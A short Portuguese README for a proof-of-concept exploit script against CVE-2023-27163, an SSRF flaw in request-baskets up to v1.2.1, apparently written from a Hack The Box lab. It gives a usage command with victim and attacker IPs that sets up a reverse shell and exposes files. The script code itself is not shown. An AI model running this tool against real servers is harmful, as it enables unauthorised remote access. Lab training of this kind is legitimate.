
Exploit de prova de conceito para CVE-2023-27163, uma vulnerabilidade de Server-Side Request Forgery (SSRF) em request-baskets até v1.2.1. Inclui geração automatizada de reverse shell e exposição de arquivos.
PoC CVE-2023-27163, SSRF, request-baskets até v1.2.1
Exemplo de uso
my_script.sh -i 10.10.11.111 -f 'localhost:80' -t 10.10.14.27
-i ip do servidor vítima
-f ip ou endereço para onde direcionar as conexões produzidas pelo SSRF
-t nesta opção vai seu ip local ou o ip atacante, para geração do arquivo rev.sh, expor o arquivo.
-p caso deseje definir uma porta específica.
Este script foi desenvolvido com base em um laboratório prático do HTB.